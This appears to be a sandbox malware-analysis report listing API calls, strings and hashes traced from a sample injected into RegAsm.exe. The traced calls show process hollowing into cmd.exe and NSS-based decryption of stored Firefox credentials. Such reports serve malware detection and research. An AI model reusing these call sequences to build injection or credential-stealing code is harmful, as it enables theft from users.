                                                                                                        • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C214919
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C21493F
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214970
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C2149A0
                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C2149AD
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C2149D4
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C2149F4
                                                                                                        • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C214A10
                                                                                                        • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C214A27
                                                                                                        • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C214A3D
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C214A4F
                                                                                                        • PL_strcasecmp.NSS3(00000000,every), ref: 6C214A6C
                                                                                                        • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C214A81
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214AAB
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C214ABE
                                                                                                        • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C214ADC
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214B17
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C214B33
                                                                                                          • Part of subcall function 6C214120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C21413D
                                                                                                          • Part of subcall function 6C214120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C214162
                                                                                                          • Part of subcall function 6C214120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C21416B
                                                                                                          • Part of subcall function 6C214120: PL_strncasecmp.NSS3(2B!l,?,00000001), ref: 6C214187
                                                                                                          • Part of subcall function 6C214120: NSSUTIL_ArgSkipParameter.NSS3(2B!l), ref: 6C2141A0
                                                                                                          • Part of subcall function 6C214120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2141B4
                                                                                                          • Part of subcall function 6C214120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C2141CC
                                                                                                          • Part of subcall function 6C214120: NSSUTIL_ArgFetchValue.NSS3(2B!l,?), ref: 6C214203
                                                                                                        • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C214B53
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214B94
                                                                                                        • free.MOZGLUE(?), ref: 6C214BA7
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214BB7
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214BC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                        • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                        • API String ID: 3791087267-1256704202
                                                                                                        • Opcode ID: 7c803ec04574af7650388a62427d23062a2aa63ad801c8bb43a370918b0c6da6
                                                                                                        • Instruction ID: a728b328f3fd5e4a5e6f74d0fc17076e2f6b8f5a0aa2e7dea464fe21ad90ded4
                                                                                                        • Opcode Fuzzy Hash: 7c803ec04574af7650388a62427d23062a2aa63ad801c8bb43a370918b0c6da6
                                                                                                        • Instruction Fuzzy Hash: 5EC1F871E0925E5BDB10DF689C40BAE7BF8AF0620DF140029EE99A7E41E7319A14C7A1
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                        • wsprintfA.USER32 ref: 00415B50
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                        • wsprintfA.USER32 ref: 00415BC9
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
                                                                                                          • Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
                                                                                                          • Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415CD8
                                                                                                        • FindClose.KERNEL32(?), ref: 00415CEC
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415D1A
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415D2D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00415D39
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00415D56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                        • String ID: %s\%s$%s\*$K_A
                                                                                                        • API String ID: 2347508687-1624741228
                                                                                                        • Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
                                                                                                        • Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
                                                                                                        • Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
                                                                                                        • Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: /$UT
                                                                                                        • API String ID: 0-1626504983
                                                                                                        • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                        • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                        • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                        • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040F57C
                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                                                                        • ResumeThread.KERNEL32(?), ref: 0040F608
                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                                                                        • ResumeThread.KERNEL32(?), ref: 0040F69F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                        • String ID: C:\Windows\System32\cmd.exe$a-A
                                                                                                        • API String ID: 3621800378-431432405
                                                                                                        • Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                        • Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
                                                                                                        • Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                        • Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F0AE
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F0C8
                                                                                                        • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C21F101
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F11D
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C2E218C), ref: 6C21F183
                                                                                                        • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C21F19A
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21F1CB
                                                                                                        • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C21F1EF
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C21F210
                                                                                                          • Part of subcall function 6C1C52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C21F1E9,?,00000000,?,?), ref: 6C1C52F5
                                                                                                          • Part of subcall function 6C1C52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C1C530F
                                                                                                          • Part of subcall function 6C1C52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C1C5326
                                                                                                          • Part of subcall function 6C1C52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C21F1E9,?,00000000,?,?), ref: 6C1C5340
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21F227
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C21F23E
                                                                                                          • Part of subcall function 6C20BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C1BE708,00000000,00000000,00000004,00000000), ref: 6C20BE6A
                                                                                                          • Part of subcall function 6C20BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C1C04DC,?), ref: 6C20BE7E
                                                                                                          • Part of subcall function 6C20BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C20BEC2
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C21F2BB
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C21F3A8
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C21F3B3
                                                                                                          • Part of subcall function 6C1C2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C1C2D3C
                                                                                                          • Part of subcall function 6C1C2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1C2D5F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1559028977-0
                                                                                                        • Opcode ID: 16dd1b67556d6303a1a50f237598b32acee6785d80f88479b24910bcaf25f58d
                                                                                                        • Instruction ID: 958f4e94c4c12a18be3c7a740e110c86908a5ba70fb7125b13001d72af76ed90
                                                                                                        • Opcode Fuzzy Hash: 16dd1b67556d6303a1a50f237598b32acee6785d80f88479b24910bcaf25f58d
                                                                                                        • Instruction Fuzzy Hash: E8D180B5E0524A9FDB14CF99D880A9FB7F5EF48308F158029EE25A7B11EB31E805CB50
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?), ref: 6C14B039
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B090
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B0A2
                                                                                                        • CloseHandle.KERNEL32(?,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?,?,?), ref: 6C14B100
                                                                                                        • sqlite3_free.NSS3(?,?,00000002,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?), ref: 6C14B115
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B12D
                                                                                                          • Part of subcall function 6C139EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C14C6FD,?,?,?,?,6C19F965,00000000), ref: 6C139F0E
                                                                                                          • Part of subcall function 6C139EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C19F965,00000000), ref: 6C139F5D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                        • String ID: `,l
                                                                                                        • API String ID: 3155957115-3859844005
                                                                                                        APIs
                                                                                                        • PK11_PubDeriveWithKDF.NSS3 ref: 6C1E0F8D
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E0FB3
                                                                                                        • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C1E1006
                                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C1E101C
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1E1033
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1E103F
                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C1E1048
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1E108E
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E10BB
                                                                                                        • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C1E10D6
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1E112E
                                                                                                          • Part of subcall function 6C1E1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C1E08C4,?,?), ref: 6C1E15B8
                                                                                                          • Part of subcall function 6C1E1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C1E08C4,?,?), ref: 6C1E15C1
                                                                                                          • Part of subcall function 6C1E1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E162E
                                                                                                          • Part of subcall function 6C1E1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E1637
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                        • String ID:
                                                                                                        • API String ID: 1510409361-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C14103E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C141139
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C141190
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C141227
                                                                                                        • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C14126E
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C14127F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                        • String ID: P,l$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                        • API String ID: 2733752649-126046869
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C3F
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C60
                                                                                                        • PR_ExplodeTime.NSS3(00000000,6C1B1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                        • API String ID: 3534712800-180463219
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C281027
                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2810B2
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C281353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$strlen
                                                                                                        • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                        • API String ID: 2619041689-2155869073
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040A815
                                                                                                        • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
                                                                                                        • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
                                                                                                        • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
                                                                                                        • _memmove.LIBCMT ref: 0040A8BB
                                                                                                        • lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
                                                                                                        • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
                                                                                                        • lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4058207798-0
                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 0040CD5C
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
                                                                                                        • StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
                                                                                                        • StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040D23C
                                                                                                        • FindClose.KERNEL32(?), ref: 0040D250
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                        • String ID: %s\*.*
                                                                                                        • API String ID: 833390005-1013718255
                                                                                                        • Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
                                                                                                        • Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
                                                                                                        • Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
